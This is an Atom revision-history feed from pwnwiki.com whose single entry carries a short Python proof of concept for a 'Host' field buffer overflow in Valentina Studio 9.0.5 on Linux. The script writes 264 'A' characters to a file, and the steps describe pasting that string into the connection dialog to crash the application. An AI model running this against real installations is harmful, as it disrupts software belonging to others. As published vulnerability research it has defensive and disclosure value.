<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Valentina_Studio_9.0.5_Linux_-_%27Host%27_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>Valentina Studio 9.0.5 Linux - 'Host' 緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Valentina_Studio_9.0.5_Linux_-_%27Host%27_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Valentina_Studio_9.0.5_Linux_-_%27Host%27_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-09T04:37:08Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Valentina_Studio_9.0.5_Linux_-_%27Host%27_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2040&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # -*- coding: utf-8 -*- # Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC) # Date: 20/02/2019 # Author: Alejandra Sánchez # Vendor Hom...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Valentina_Studio_9.0.5_Linux_-_%27Host%27_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2040&amp;oldid=prev"/>
		<updated>2021-05-02T05:04:17Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # -*- coding: utf-8 -*- # Exploit Title: Valentina Studio 9.0.5 Linux - &amp;#039;Host&amp;#039; Buffer Overflow (PoC) # Date: 20/02/2019 # Author: Alejandra Sánchez # Vendor Hom...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# -*- coding: utf-8 -*-&lt;br /&gt;
# Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)&lt;br /&gt;
# Date: 20/02/2019&lt;br /&gt;
# Author: Alejandra Sánchez&lt;br /&gt;
# Vendor Homepage: https://valentina-db.com/en/&lt;br /&gt;
# Software Link: https://www.valentina-db.com/en/all-downloads/vstudio/current/vstudio_x64_lin-deb?format=raw&lt;br /&gt;
# Version: 9.0.5&lt;br /&gt;
# Tested on: Linux kali amd64&lt;br /&gt;
&lt;br /&gt;
# Proof of Concept:&lt;br /&gt;
# 1.- Run the python script &amp;quot;vstudio.py&amp;quot;, it will create a new file &amp;quot;vstudio.txt&amp;quot;&lt;br /&gt;
# 2.- Copy the text from the generated vstudio.txt file to clipboard&lt;br /&gt;
# 3.- Open VStudio&lt;br /&gt;
# 4.- Go to File &amp;gt; Connect to...&lt;br /&gt;
# 5.- Click on Valentina Server or SQLite Server&lt;br /&gt;
# 6.- Paste clipboard in 'Host' field&lt;br /&gt;
# 7.- Click on button -&amp;gt; Connect&lt;br /&gt;
# 8.- Crashed&lt;br /&gt;
&lt;br /&gt;
buffer = &amp;quot;\x41&amp;quot; * 264&lt;br /&gt;
f = open (&amp;quot;vstudio.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f.write(buffer)&lt;br /&gt;
f.close()&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>